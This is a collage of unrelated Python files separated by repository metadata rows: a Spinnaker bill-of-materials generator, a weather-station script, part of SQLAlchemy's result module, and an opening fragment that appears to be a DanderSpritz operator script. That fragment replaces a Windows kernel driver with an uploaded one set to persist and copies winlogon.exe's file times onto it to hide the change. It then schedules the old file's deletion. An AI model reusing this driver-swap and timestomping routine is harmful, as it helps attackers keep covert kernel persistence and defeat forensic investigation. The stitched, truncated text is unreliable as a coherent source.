dsz.ui.Echo(' FAILED (value is bad)', dsz.ERROR)
rtn = False
else:
dsz.ui.Echo(' FAILED (value not found)', dsz.ERROR)
rtn = False
dsz.ui.Echo('Checking for key/Type')
if dsz.cmd.Run('registryquery -hive L -key %s -value Type' % keyLoc, dsz.RUN_FLAG_RECORD):
valueGood = False
try:
type = dsz.cmd.data.Get('Key::Value::Type', dsz.TYPE_STRING)
if type[0] == 'REG_DWORD':
data = dsz.cmd.data.Get('Key::Value::Value', dsz.TYPE_STRING)
if len(data[0]) > 0 and int(data[0]) == typeValue:
valueGood = True
except:
pass
if valueGood:
dsz.ui.Echo(' SUCCESS', dsz.GOOD)
else:
dsz.ui.Echo(' FAILED (value is bad)', dsz.ERROR)
rtn = False
else:
dsz.ui.Echo(' FAILED (value not found)', dsz.ERROR)
rtn = False
return rtn
def VerifyRunning(driverName):
x = dsz.control.Method()
dsz.control.echo.Off()
dsz.control.wow64.Disable()
if len(driverName) == 0:
dsz.ui.Echo('* Invalid driver name given', dsz.ERROR)
return False
dsz.ui.Echo('Getting driver list')
if dsz.cmd.Run('drivers -list -minimal', dsz.RUN_FLAG_RECORD):
dsz.ui.Echo(' SUCCESS', dsz.GOOD)
else:
dsz.ui.Echo(' FAILED (query of running drivers failed)', dsz.ERROR)
return False
try:
drivers = dsz.cmd.data.Get('DriverItem', dsz.TYPE_OBJECT)
except:
dsz.ui.Echo(' FAILED (failed to get driver list data)', dsz.ERROR)
return False
lowerDriverName = driverName.lower()
fullLowerDriverName = '%s.sys' % driverName.lower()
dsz.ui.Echo('Checking for %s' % driverName)
for driverObj in drivers:
try:
name = dsz.cmd.data.ObjectGet(driverObj, 'Name', dsz.TYPE_STRING)
namePieces = dsz.path.Split(name[0])
if namePieces[1].lower() == lowerDriverName or namePieces[1].lower() == fullLowerDriverName:
dsz.ui.Echo(' SUCCESS', dsz.GOOD)
return True
except:
pass
dsz.ui.Echo(' FAILED (driver not running)', dsz.ERROR)
return False
def UpgradeDriver(project, drvName, ask=True):
x = dsz.control.Method()
dsz.control.echo.Off()
systemRoot = dsz.path.windows.GetSystemPath()
tmpName = '%s32.sys' % drvName
dsz.ui.Echo('Move existing driver')
if not dsz.cmd.Run('move "%s\\drivers\\%s.sys" "%s\\drivers\\%s"' % (systemRoot, drvName, systemRoot, tmpName)):
dsz.ui.Echo(' FAILED', dsz.ERROR)
return False
dsz.ui.Echo(' MOVED', dsz.GOOD)
dsz.ui.Echo('Uploading the SYS file')
if not dsz.cmd.Run('put "%s.sys" -name "%s\\drivers\\%s.sys" -permanent -project %s' % (drvName, systemRoot, drvName, project)):
dsz.ui.Echo(' FAILED', dsz.ERROR)
dsz.cmd.Run('move "%s\\drivers\\%s.sys" "%s\\drivers\\%s"' % (systemRoot, tmpName, systemRoot, drvName))
return False
dsz.ui.Echo(' SUCCESS', dsz.GOOD)
if dsz.version.checks.IsOs64Bit():
matchFile = '%s\\winlogon.exe' % systemRoot
else:
matchFile = '%s\\user.exe' % systemRoot
dsz.ui.Echo('Matching file times for %s.sys with %s' % (drvName, matchFile))
if dsz.cmd.Run('matchfiletimes -src "%s" -dst "%s\\drivers\\%s.sys"' % (matchFile, systemRoot, drvName)):
dsz.ui.Echo(' MATCHED', dsz.GOOD)
else:
dsz.ui.Echo(' FAILED', dsz.WARNING)
dsz.ui.Echo('Matching file times for %s with %s' % (tmpName, matchFile))
if dsz.cmd.Run('matchfiletimes -src "%s" -dst "%s\\drivers\\%s"' % (matchFile, systemRoot, tmpName)):
dsz.ui.Echo(' MATCHED', dsz.GOOD)
else:
dsz.ui.Echo(' FAILED', dsz.WARNING)
dsz.ui.Echo('Deleting existing driver')
if dsz.cmd.Run('delete -file "%s\\drivers\\%s" -afterreboot' % (systemRoot, tmpName)):
dsz.ui.Echo(' MOVED', dsz.GOOD)
else:
dsz.ui.Echo(' FAILED', dsz.ERROR)
dsz.ui.Echo('Upgrade complete (reboot required)')
return True
def _isDriverSigningEnabled():
if dsz.version.checks.windows.IsVistaOrGreater():
if dsz.version.checks.IsOs64Bit():
return True
return False
|
unlicense
| 6,155,391,410,086,799,000
| 38.073333
| 158
| 0.594233
| false
| 3.225371
| false
| false
| false
|
Roshan2017/spinnaker
|
dev/generate_bom.py
|
1
|
12830
|
#!/usr/bin/python
#
# Copyright 2017 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import argparse
import datetime
import os
import socket
import sys
import yaml
from annotate_source import Annotator
from spinnaker.run import run_quick
SERVICES = 'services'
VERSION = 'version'
GOOGLE_CONTAINER_BUILDER_SERVICE_BASE_CONFIG = {
'steps': [
{
'name': 'java:8',
'env': ['GRADLE_USER_HOME=cache'],
'args': []
},
{
'name': 'gcr.io/cloud-builders/docker',
'args': []
}
],
'images': [],
'timeout': '3600s'
}
GOOGLE_CONTAINER_BUILDER_MONITORING_BASE_CONFIG = {
'steps': [
{
'name': 'gcr.io/cloud-builders/docker',
'dir': 'spinnaker-monitoring-daemon',
'args': []
}
],
'images': [],
'timeout': '3600s'
}
class BomGenerator(Annotator):
"""Provides facilities for generating the Bill of Materials file for the
Spinnaker product release.
This assumes Halyard (https://github.com/spinnaker/halyard) is installed on
the machine this script runs on.
"""
COMPONENTS = [
'clouddriver',
'deck',
'echo',
'front50',
'gate',
'igor',
'orca',
'rosco',
'fiat',
'spinnaker-monitoring',
'spinnaker'
]
def __init__(self, options):
self.__base_dir = options.base_dir
self.__docker_registry = options.docker_registry
self.__bom_file = ''
self.__component_versions = {}
self.__changelog_start_hashes = {} # Hashes to start from when generating changelogs.
self.__toplevel_version = ''
self.__changelog_output = options.changelog_output
self.__alias = options.bom_alias
super(BomGenerator, self).__init__(options)
@classmethod
def init_argument_parser(cls, parser):
"""Initialize command-line arguments."""
parser.add_argument('--base_dir', default='.', required=True,
help="Base directory containing the component's git repositories as subdirectories.")
parser.add_argument('--container_builder', default='gcb',
help="Type of builder to use. Currently, the supported options are {'gcb', 'docker'}.")
parser.add_argument('--docker_registry', default='',
help="Docker registry to push the container images to.")
parser.add_argument('--changelog_output', default='',
help="Output file to write the changelog to.")
parser.add_argument('--bom_alias', default='',
help="Alias to rename the 'real' BOM as. This also sets the Spinnaker version as the alias.")
super(BomGenerator, cls).init_argument_parser(parser)
def __version_from_tag(self, comp):
"""Determine the component version from the 'version-X.Y.Z' git tag.
Args:
comp [string]: Spinnaker component name.
Returns:
[string] Component version with build number and without 'version-'.
"""
version_bump = self.__component_versions[comp]
next_tag_with_build = '{0}-{1}'.format(version_bump.version_str,
self.build_number)
first_dash_idx = next_tag_with_build.index('-')
return next_tag_with_build[first_dash_idx + 1:]
def write_container_builder_gcr_config(self):
"""Write a configuration file for producing Container Images with Google Container Builder for each microservice.
"""
for comp in self.__component_versions:
if comp == 'spinnaker-monitoring':
config = dict(GOOGLE_CONTAINER_BUILDER_MONITORING_BASE_CONFIG)
version = self.__version_from_tag(comp)
versioned_image = '{reg}/monitoring-daemon:{tag}'.format(reg=self.__docker_registry,
tag=version)
config['steps'][0]['args'] = ['build', '-t', versioned_image, '-f', 'Dockerfile', '.']
config['images'] = [versioned_image]
config_file = '{0}-gcb.yml'.format(comp)
with open(config_file, 'w') as cfg:
yaml.dump(config, cfg, default_flow_style=True)
elif comp == 'spinnaker':
pass
else:
config = dict(GOOGLE_CONTAINER_BUILDER_SERVICE_BASE_CONFIG)
gradle_version = self.__version_from_tag(comp)
gradle_cmd = ''
if comp == 'deck':
gradle_cmd = './gradlew build -PskipTests'
else:
gradle_cmd = './gradlew {0}-web:installDist -x test'.format(comp)
config['steps'][0]['args'] = ['bash', '-c', gradle_cmd]
versioned_image = '{reg}/{repo}:{tag}'.format(reg=self.__docker_registry,
repo=comp,
tag=gradle_version)
config['steps'][1]['args'] = ['build', '-t', versioned_image, '-f', 'Dockerfile.slim', '.']
config['images'] = [versioned_image]
config_file = '{0}-gcb.yml'.format(comp)
with open(config_file, 'w') as cfg:
yaml.dump(config, cfg, default_flow_style=True)
def write_docker_version_files(self):
"""Write a file containing the full tag for each microservice for Docker.
"""
for comp in self.__component_versions:
if comp == 'spinnaker':
pass
gradle_version = self.__version_from_tag(comp)
docker_tag = '{reg}/{comp}:{tag}'.format(reg=self.__docker_registry,
comp=comp,
tag=gradle_version)
config_file = '{0}-docker.yml'.format(comp)
with open(config_file, 'w') as cfg:
cfg.write(docker_tag)
def generate_changelog(self):
"""Generate a release changelog and write it to a file.
The changelog contains a section per microservice that describes the
changes made since the last Spinnaker release. It also contains the
version information as well.
"""
changelog = ['Spinnaker {0}\n'.format(self.__toplevel_version)]
for comp, hash in self.__changelog_start_hashes.iteritems():
version = self.__version_from_tag(comp)
# Generate the changelog for the component.
print 'Generating changelog for {comp}...'.format(comp=comp)
# Assumes the remote repository is aliased as 'origin'.
component_url = run_quick('git -C {path} config --get remote.origin.url'
.format(path=comp)).stdout.strip()
if component_url.endswith('.git'):
component_url = component_url.replace('.git', '')
result = run_quick('cd {comp}; clog -r {url} -f {hash} --setversion {version}; cd ..'
.format(comp=comp, url=component_url, hash=hash, version=version))
if result.returncode != 0:
print "Changelog generation failed for {0} with \n{1}\n exiting...".format(comp, result.stdout)
exit(result.returncode)
# Capitalize
comp_cap = comp[0].upper() + comp[1:]
changelog.append('# {0}\n{1}'.format(comp_cap, result.stdout))
print 'Writing changelog...'
# Write the changelog with the toplevel version without the build number.
# This is ok since the changelog is only published if the toplevel version is released.
changelog_file = self.__changelog_output or '{0}-changelog.md'.format(self.__toplevel_version)
with open(changelog_file, 'w') as clog:
clog.write('\n'.join(changelog))
def write_bom(self):
output_yaml = {SERVICES: {}}
for comp in self.__component_versions:
version_bump = self.__component_versions[comp]
if version_bump.major == True:
breaking_change = True
elif version_bump.minor == True:
feature = True
gradle_version = self.__version_from_tag(comp)
version_entry = {VERSION: gradle_version}
if comp == 'spinnaker-monitoring':
# Add two entries for both components of spinnaker-monitoring
output_yaml[SERVICES]['monitoring-third-party'] = dict(version_entry)
output_yaml[SERVICES]['monitoring-daemon'] = dict(version_entry)
else:
output_yaml[SERVICES][comp] = version_entry
timestamp = '{:%Y-%m-%d}'.format(datetime.datetime.now())
self.__toplevel_version = '{0}-{1}'.format(self.branch, timestamp)
toplevel_with_build = '{0}-{1}'.format(self.__toplevel_version, self.build_number)
output_yaml[VERSION] = toplevel_with_build
self.__bom_file = '{0}.yml'.format(toplevel_with_build)
self.write_bom_file(self.__bom_file, output_yaml)
if self.__alias:
output_yaml[VERSION] = self.__alias
self.write_bom_file(self.__alias + '.yml', output_yaml)
def publish_boms(self):
"""Pushes the generated BOMs to a public GCS bucket for Halyard to use.
"""
self.publish_bom(self.__bom_file)
if self.__alias:
self.publish_bom(self.__alias + '.yml')
def write_bom_file(self, filename, output_yaml):
"""Helper function to write the calculated BOM to files.
Args:
filename [string]: Name of the file to write to.
output_yaml [dict]: Dictionary containing BOM information.
"""
with open(filename, 'w') as output_file:
output_yaml['timestamp'] = '{:%Y-%m-%d %H:%M:%S}'.format(datetime.datetime.now())
output_yaml['hostname'] = socket.gethostname()
yaml.dump(output_yaml, output_file, default_flow_style=False)
print 'Wrote BOM to {0}.'.format(filename)
def publish_bom(self, bom_path):
"""Publishes the BOM using Halyard.
Assumes that Halyard is installed and correctly configured on the current
machine.
"""
result = run_quick('hal admin publish bom --color false --bom-path {0}'
.format(bom_path))
if result.returncode != 0:
print "'hal admin publish bom' command failed with: \n{0}\n exiting...".format(result.stdout)
exit(result.returncode)
def __publish_config(self, component, profile_path):
"""Publishes the yaml configuration consumed by Halyard for the component.
Args:
component [string]: Name of the Spinnaker component.
profile_path [string]: Path to component's yaml configuration file.
"""
for profile in os.listdir(profile_path):
full_profile = os.path.join(profile_path, profile)
if os.path.isfile(full_profile):
result = run_quick(
'hal admin publish profile {0} --color false --bom-path {1} --profile-path {2}'
.format(component, self.__bom_file, full_profile)
)
if result.returncode != 0:
print "'hal admin publish profile' command failed with: \n{0}\n exiting...".format(result.stdout)
exit(result.returncode)
def publish_microservice_configs(self):
for comp in self.COMPONENTS:
if comp == 'spinnaker-monitoring':
daemon_path = '{0}-daemon'.format(comp)
config_path = os.path.join(comp, daemon_path, 'halconfig')
self.__publish_config('monitoring-daemon', config_path)
elif comp == 'spinnaker':
pass
else:
config_path = os.path.join(comp, 'halconfig')
self.__publish_config(comp, config_path)
def determine_and_tag_versions(self):
for comp in self.COMPONENTS:
self.path = os.path.join(self.__base_dir, comp)
self.checkout_branch()
self.parse_git_tree()
self.__changelog_start_hashes[comp] = self.current_version.hash
version_bump = self.tag_head()
self.__component_versions[comp] = version_bump
self.delete_unwanted_tags()
@classmethod
def main(cls):
parser = argparse.ArgumentParser()
cls.init_argument_parser(parser)
options = parser.parse_args()
if options.container_builder not in ['gcb', 'docker']:
raise ValueError(
'Invalid container_builder="{0}"'.format(options.container_builder))
bom_generator = cls(options)
bom_generator.determine_and_tag_versions()
if options.container_builder == 'gcb':
bom_generator.write_container_builder_gcr_config()
elif options.container_builder == 'docker':
bom_generator.write_docker_version_files()
else:
raise NotImplementedError('container_builder="{0}"'.format(
options.container_builder))
bom_generator.write_bom()
bom_generator.publish_boms()
bom_generator.publish_microservice_configs()
bom_generator.generate_changelog()
if __name__ == '__main__':
sys.exit(BomGenerator.main())
|
apache-2.0
| 735,947,141,761,425,800
| 37.878788
| 117
| 0.628059
| false
| 3.833284
| true
| false
| false
|
bakostamas/weather-station
|
weather.py
|
1
|
9237
|
import json, pprint, app_settings, pytz
import connected_sensor
from datetime import datetime
from urllib.request import urlopen # Only in Python 3
weather_list = {}
def get_weather_data(p_city_id, p_type, p_cnt):
"""
Get weather data from openweathermap.org
:param p_city_id: ID of the city
:param p_type: 'DF'=Daily forecast for 7 days, 'F'=3 hours forecast for 5 days, 'NOW'=Weather Now
:param p_cnt: Forecasted days limit, 0=No_limit
:return: weather_data{} (dictionary)
"""
if p_type == 'DF':
url_domain = 'http://api.openweathermap.org/data/2.5/forecast/daily'
elif p_type == 'F':
url_domain = 'http://api.openweathermap.org/data/2.5/forecast'
elif p_type == 'NOW':
url_domain = 'http://api.openweathermap.org/data/2.5/weather'
access_link = url_domain+'?id='+str(p_city_id)+'&appid='+app_settings.appid+'&units='+app_settings.units+\
'&lang='+app_settings.lang+'&mode='+app_settings.mode
if p_cnt > 0:
access_link += '&cnt='+str(p_cnt)
try:
response = urlopen(access_link)
json_data = response.read().decode('utf-8')
weather_data = json.loads(json_data)
except: # If the weather server is unavailable return an empty dictionary
weather_data = {}
return weather_data
class WeatherNow:
"""Weather details for current weather"""
def __init__(self):
if len(weather_list) != 0:
self.query_date = datetime.now(pytz.timezone(app_settings.timezone))
self.city_name = weather_list['name']
self.country_code = weather_list['sys']['country']
timestamp = weather_list['dt']
date_object = datetime.fromtimestamp(timestamp, tz=pytz.timezone(app_settings.timezone))
self.date = date_object.strftime(app_settings.full_date_format)
self.day_of_week = date_object.strftime("%A").capitalize()
self.clouds = weather_list['clouds']['all']
try:
self.wind_dir = weather_list['wind']['deg']
except:
self.wind_dir = '0'
# int() ensures to not display the .0 decimal of the rounded value
self.wind_speed = int(round(weather_list['wind']['speed'] * 3.6, 0)) # converted to Km/h
self.humidity = int(round(weather_list['main']['humidity'], 0))
self.pressure = int(round(weather_list['main']['pressure'], 0))
self.temp_now = round(weather_list['main']['temp'], 1) # rounded to 1 decimal
self.weather_id = weather_list['weather'][0]['id']
self.weather_sum = weather_list['weather'][0]['main']
self.weather_desc = weather_list['weather'][0]['description'].title() # First letters to uppercase
try:
self.rain_volume = weather_list['rain']['3h'] # Rain vloume in the last 3 hours
except:
self.rain_volume = 0
try:
self.snow_volume = weather_list['snow']['3h'] # Snow volume in the last 3 hours
except:
self.snow_volume = 0
timestamp_sunrise = weather_list['sys']['sunrise']
date_object_sunrise = datetime.fromtimestamp(timestamp_sunrise, tz=pytz.timezone(app_settings.timezone))
self.sunrise = date_object_sunrise.strftime(app_settings.time_format)
timestamp_sunset = weather_list['sys']['sunset']
date_object_sunset = datetime.fromtimestamp(timestamp_sunset, tz=pytz.timezone(app_settings.timezone))
self.sunset = date_object_sunset.strftime(app_settings.time_format)
# Define the weather icon and css template based on it's day or night now:
if date_object_sunrise < self.query_date and self.query_date < date_object_sunset:
self.weather_icon = 'wi-owm-day-' + str(self.weather_id)
self.color_theme = app_settings.color_theme_day
else:
self.weather_icon = 'wi-owm-night-' + str(self.weather_id)
self.color_theme = app_settings.color_theme_night
# Get sensor's data
self.sensor_data = connected_sensor.SensorData()
self.sensor_data.pressure_r = round(self.sensor_data.pressure)
class WeatherForecast:
"""Weather details for forecast"""
def __init__(self):
# Init the arrays with 0 values at index zero color_theme
self.date = ["0"]
self.date2 = ["0"]
self.day_of_week = ["0"]
self.clouds = ["0"]
self.wind_dir = ["0"]
self.wind_speed = ["0"]
self.humidity = ["0"]
self.pressure = ["0"]
self.temp_day = ["0"]
self.temp_min = ["0"]
self.temp_max = ["0"]
self.temp_diff = ["0"]
self.temp_diff_trend = ["0"]
self.temp_night = ["0"]
self.temp_eve = ["0"]
self.temp_morn = ["0"]
self.weather_id = ["0"]
self.weather_sum = ["0"]
self.weather_desc = ["0"]
if len(weather_list) != 0:
self.city_name = weather_list['city']['name']
self.country_code = weather_list['city']['country']
self.query_date = datetime.now(pytz.timezone(app_settings.timezone))
for list_index in range(1, 6): # weather_list['list']
timestamp = weather_list['list'][list_index]['dt']
date_object = datetime.fromtimestamp(timestamp, tz=pytz.timezone(app_settings.timezone))
self.date.append(date_object.strftime(app_settings.short_date_format)) # The same date in different format
self.date2.append(date_object.strftime("%Y-%m-%d")) # The same date in different format
self.day_of_week.append(date_object.strftime("%A").capitalize())
self.clouds.append(weather_list['list'][list_index]['clouds'])
self.wind_dir.append(weather_list['list'][list_index]['deg'])
self.wind_speed.append(int(round(weather_list['list'][list_index]['speed'] * 3.6, 0))) # converted to Km/h
self.humidity.append(int(round(weather_list['list'][list_index]['humidity'], 0)))
self.pressure.append(int(round(weather_list['list'][list_index]['pressure'],0)))
self.temp_day.append(int(round(weather_list['list'][list_index]['temp']['day'], 0)))
self.temp_min.append(int(round(weather_list['list'][list_index]['temp']['min'], 0)))
self.temp_max.append(int(round(weather_list['list'][list_index]['temp']['max'], 0)))
# "temp_diff" is the temperature difference between the given day's max and the previous day's max.
difference = calculate_temp_dif(self.temp_max[list_index], self.temp_max[list_index-1])
self.temp_diff.append(difference['temp_diff'])
self.temp_diff_trend.append(difference['temp_diff_trend'])
self.temp_night.append(int(round(weather_list['list'][list_index]['temp']['night'], 0)))
self.temp_eve.append(int(round(weather_list['list'][list_index]['temp']['eve'], 0)))
self.temp_morn.append(int(round(weather_list['list'][list_index]['temp']['morn'], 0)))
self.weather_id.append(weather_list['list'][list_index]['weather'][0]['id'])
self.weather_sum.append(weather_list['list'][list_index]['weather'][0]['main'])
self.weather_desc.append(weather_list['list'][list_index]['weather'][0]['description'].title()) # First letters to uppercase
def fetch_weather_now(p_city_code):
"""
Fetch the current weather
:param p_city_code: ID of the city
"""
global weather_list
weather_list.clear()
access_type = 'NOW' # Current weather
weather_list = get_weather_data(p_city_code, access_type, 0)
weather = WeatherNow()
return weather
def fetch_weather_forecast(p_city_code):
"""
Fetch the forecasted weather
:param p_city_code: ID of the city
"""
global weather_list
weather_list.clear()
access_type = 'DF' # Daily forecast
weather_list = get_weather_data(p_city_code, access_type, 0)
weather = WeatherForecast() # parameter: index in the weather_list
return weather
def calculate_temp_dif(temp_today, temp_last_day):
"""
Calculate the difference between two temperature and determine the appropriate icon code
:param temp_today: Today's max temperature forecast
:param temp_last_day: Yesterday's max temperature
"""
diff = int(temp_today) - int(temp_last_day)
if diff > 0:
temp_diff = '+' + str(diff)
temp_diff_trend = ['wi-direction-up', 'red']
elif diff < 0:
temp_diff = str(diff)
temp_diff_trend = ['wi-direction-down', 'blue']
else:
temp_diff = str(diff)
temp_diff_trend = ['wi-direction-right', 'green']
return {'temp_diff': temp_diff, 'temp_diff_trend': temp_diff_trend}
# ONLY FOR TESTING PURPOSE:
# weather_list = get_weather_data(3054643, 'DF', 0)
# pprint.pprint(weather_list)
# for list_index in weather_list['list']:
# print(list_index)
#
# print('----')
# print(weather_list['list'][6])
|
gpl-3.0
| 1,599,481,039,528,907,800
| 42.570755
| 141
| 0.598354
| false
| 3.596963
| false
| false
| false
|
michaelBenin/sqlalchemy
|
lib/sqlalchemy/engine/result.py
|
1
|
36000
|
# engine/result.py
# Copyright (C) 2005-2014 the SQLAlchemy authors and contributors <see AUTHORS file>
#
# This module is part of SQLAlchemy and is released under
# the MIT License: http://www.opensource.org/licenses/mit-license.php
"""Define result set constructs including :class:`.ResultProxy`
and :class:`.RowProxy."""
from .. import exc, util
from ..sql import expression, sqltypes
import collections
import operator
# This reconstructor is necessary so that pickles with the C extension or
# without use the same Binary format.
try:
# We need a different reconstructor on the C extension so that we can
# add extra checks that fields have correctly been initialized by
# __setstate__.
from sqlalchemy.cresultproxy import safe_rowproxy_reconstructor
# The extra function embedding is needed so that the
# reconstructor function has the same signature whether or not
# the extension is present.
def rowproxy_reconstructor(cls, state):
return safe_rowproxy_reconstructor(cls, state)
except ImportError:
def rowproxy_reconstructor(cls, state):
obj = cls.__new__(cls)
obj.__setstate__(state)
return obj
try:
from sqlalchemy.cresultproxy import BaseRowProxy
except ImportError:
class BaseRowProxy(object):
__slots__ = ('_parent', '_row', '_processors', '_keymap')
def __init__(self, parent, row, processors, keymap):
"""RowProxy objects are constructed by ResultProxy objects."""
self._parent = parent
self._row = row
self._processors = processors
self._keymap = keymap
def __reduce__(self):
return (rowproxy_reconstructor,
(self.__class__, self.__getstate__()))
def values(self):
"""Return the values represented by this RowProxy as a list."""
return list(self)
def __iter__(self):
for processor, value in zip(self._processors, self._row):
if processor is None:
yield value
else:
yield processor(value)
def __len__(self):
return len(self._row)
def __getitem__(self, key):
try:
processor, obj, index = self._keymap[key]
except KeyError:
processor, obj, index = self._parent._key_fallback(key)
except TypeError:
if isinstance(key, slice):
l = []
for processor, value in zip(self._processors[key],
self._row[key]):
if processor is None:
l.append(value)
else:
l.append(processor(value))
return tuple(l)
else:
raise
if index is None:
raise exc.InvalidRequestError(
"Ambiguous column name '%s' in result set! "
"try 'use_labels' option on select statement." % key)
if processor is not None:
return processor(self._row[index])
else:
return self._row[index]
def __getattr__(self, name):
try:
return self[name]
except KeyError as e:
raise AttributeError(e.args[0])
class RowProxy(BaseRowProxy):
"""Proxy values from a single cursor row.
Mostly follows "ordered dictionary" behavior, mapping result
values to the string-based column name, the integer position of
the result in the row, as well as Column instances which can be
mapped to the original Columns that produced this result set (for
results that correspond to constructed SQL expressions).
"""
__slots__ = ()
def __contains__(self, key):
return self._parent._has_key(self._row, key)
def __getstate__(self):
return {
'_parent': self._parent,
'_row': tuple(self)
}
def __setstate__(self, state):
self._parent = parent = state['_parent']
self._row = state['_row']
self._processors = parent._processors
self._keymap = parent._keymap
__hash__ = None
def _op(self, other, op):
return op(tuple(self), tuple(other)) \
if isinstance(other, RowProxy) \
else op(tuple(self), other)
def __lt__(self, other):
return self._op(other, operator.lt)
def __le__(self, other):
return self._op(other, operator.le)
def __ge__(self, other):
return self._op(other, operator.ge)
def __gt__(self, other):
return self._op(other, operator.gt)
def __eq__(self, other):
return self._op(other, operator.eq)
def __ne__(self, other):
return self._op(other, operator.ne)
def __repr__(self):
return repr(tuple(self))
def has_key(self, key):
"""Return True if this RowProxy contains the given key."""
return self._parent._has_key(self._row, key)
def items(self):
"""Return a list of tuples, each tuple containing a key/value pair."""
# TODO: no coverage here
return [(key, self[key]) for key in self.keys()]
def keys(self):
"""Return the list of keys as strings represented by this RowProxy."""
return self._parent.keys
def iterkeys(self):
return iter(self._parent.keys)
def itervalues(self):
return iter(self)
try:
# Register RowProxy with Sequence,
# so sequence protocol is implemented
from collections import Sequence
Sequence.register(RowProxy)
except ImportError:
pass
class ResultMetaData(object):
"""Handle cursor.description, applying additional info from an execution
context."""
def __init__(self, parent, metadata):
self._processors = processors = []
# We do not strictly need to store the processor in the key mapping,
# though it is faster in the Python version (probably because of the
# saved attribute lookup self._processors)
self._keymap = keymap = {}
self.keys = []
context = parent.context
dialect = context.dialect
typemap = dialect.dbapi_type_map
translate_colname = context._translate_colname
self.case_sensitive = dialect.case_sensitive
# high precedence key values.
primary_keymap = {}
for i, rec in enumerate(metadata):
colname = rec[0]
coltype = rec[1]
if dialect.description_encoding:
colname = dialect._description_decoder(colname)
if translate_colname:
colname, untranslated = translate_colname(colname)
if dialect.requires_name_normalize:
colname = dialect.normalize_name(colname)
if context.result_map:
try:
name, obj, type_ = context.result_map[colname
if self.case_sensitive
else colname.lower()]
except KeyError:
name, obj, type_ = \
colname, None, typemap.get(coltype, sqltypes.NULLTYPE)
else:
name, obj, type_ = \
colname, None, typemap.get(coltype, sqltypes.NULLTYPE)
processor = context.get_result_processor(type_, colname, coltype)
processors.append(processor)
rec = (processor, obj, i)
# indexes as keys. This is only needed for the Python version of
# RowProxy (the C version uses a faster path for integer indexes).
primary_keymap[i] = rec
# populate primary keymap, looking for conflicts.
if primary_keymap.setdefault(
name if self.case_sensitive
else name.lower(),
rec) is not rec:
# place a record that doesn't have the "index" - this
# is interpreted later as an AmbiguousColumnError,
# but only when actually accessed. Columns
# colliding by name is not a problem if those names
# aren't used; integer access is always
# unambiguous.
primary_keymap[name
if self.case_sensitive
else name.lower()] = rec = (None, obj, None)
self.keys.append(colname)
if obj:
for o in obj:
keymap[o] = rec
# technically we should be doing this but we
# are saving on callcounts by not doing so.
# if keymap.setdefault(o, rec) is not rec:
# keymap[o] = (None, obj, None)
if translate_colname and \
untranslated:
keymap[untranslated] = rec
# overwrite keymap values with those of the
# high precedence keymap.
keymap.update(primary_keymap)
@util.pending_deprecation("0.8", "sqlite dialect uses "
"_translate_colname() now")
def _set_keymap_synonym(self, name, origname):
"""Set a synonym for the given name.
Some dialects (SQLite at the moment) may use this to
adjust the column names that are significant within a
row.
"""
rec = (processor, obj, i) = self._keymap[origname if
self.case_sensitive
else origname.lower()]
if self._keymap.setdefault(name, rec) is not rec:
self._keymap[name] = (processor, obj, None)
def _key_fallback(self, key, raiseerr=True):
map = self._keymap
result = None
if isinstance(key, util.string_types):
result = map.get(key if self.case_sensitive else key.lower())
# fallback for targeting a ColumnElement to a textual expression
# this is a rare use case which only occurs when matching text()
# or colummn('name') constructs to ColumnElements, or after a
# pickle/unpickle roundtrip
elif isinstance(key, expression.ColumnElement):
if key._label and (
key._label
if self.case_sensitive
else key._label.lower()) in map:
result = map[key._label
if self.case_sensitive
else key._label.lower()]
elif hasattr(key, 'name') and (
key.name
if self.case_sensitive
else key.name.lower()) in map:
# match is only on name.
result = map[key.name
if self.case_sensitive
else key.name.lower()]
# search extra hard to make sure this
# isn't a column/label name overlap.
# this check isn't currently available if the row
# was unpickled.
if result is not None and \
result[1] is not None:
for obj in result[1]:
if key._compare_name_for_result(obj):
break
else:
result = None
if result is None:
if raiseerr:
raise exc.NoSuchColumnError(
"Could not locate column in row for column '%s'" %
expression._string_or_unprintable(key))
else:
return None
else:
map[key] = result
return result
def _has_key(self, row, key):
if key in self._keymap:
return True
else:
return self._key_fallback(key, False) is not None
def __getstate__(self):
return {
'_pickled_keymap': dict(
(key, index)
for key, (processor, obj, index) in self._keymap.items()
if isinstance(key, util.string_types + util.int_types)
),
'keys': self.keys,
"case_sensitive": self.case_sensitive,
}
def __setstate__(self, state):
# the row has been processed at pickling time so we don't need any
# processor anymore
self._processors = [None for _ in range(len(state['keys']))]
self._keymap = keymap = {}
for key, index in state['_pickled_keymap'].items():
# not preserving "obj" here, unfortunately our
# proxy comparison fails with the unpickle
keymap[key] = (None, None, index)
self.keys = state['keys']
self.case_sensitive = state['case_sensitive']
self._echo = False
class ResultProxy(object):
"""Wraps a DB-API cursor object to provide easier access to row columns.
Individual columns may be accessed by their integer position,
case-insensitive column name, or by ``schema.Column``
object. e.g.::
row = fetchone()
col1 = row[0] # access via integer position
col2 = row['col2'] # access via name
col3 = row[mytable.c.mycol] # access via Column object.
``ResultProxy`` also handles post-processing of result column
data using ``TypeEngine`` objects, which are referenced from
the originating SQL statement that produced this result set.
"""
_process_row = RowProxy
out_parameters = None
_can_close_connection = False
_metadata = None
def __init__(self, context):
self.context = context
self.dialect = context.dialect
self.closed = False
self.cursor = self._saved_cursor = context.cursor
self.connection = context.root_connection
self._echo = self.connection._echo and \
context.engine._should_log_debug()
self._init_metadata()
def _init_metadata(self):
metadata = self._cursor_description()
if metadata is not None:
if self.context.compiled and \
'compiled_cache' in self.context.execution_options:
if self.context.compiled._cached_metadata:
self._metadata = self.context.compiled._cached_metadata
else:
self._metadata = self.context.compiled._cached_metadata = \
ResultMetaData(self, metadata)
else:
self._metadata = ResultMetaData(self, metadata)
if self._echo:
self.context.engine.logger.debug(
"Col %r", tuple(x[0] for x in metadata))
def keys(self):
"""Return the current set of string keys for rows."""
if self._metadata:
return self._metadata.keys
else:
return []
@util.memoized_property
def rowcount(self):
"""Return the 'rowcount' for this result.
The 'rowcount' reports the number of rows *matched*
by the WHERE criterion of an UPDATE or DELETE statement.
.. note::
Notes regarding :attr:`.ResultProxy.rowcount`:
* This attribute returns the number of rows *matched*,
which is not necessarily the same as the number of rows
that were actually *modified* - an UPDATE statement, for example,
may have no net change on a given row if the SET values
given are the same as those present in the row already.
Such a row would be matched but not modified.
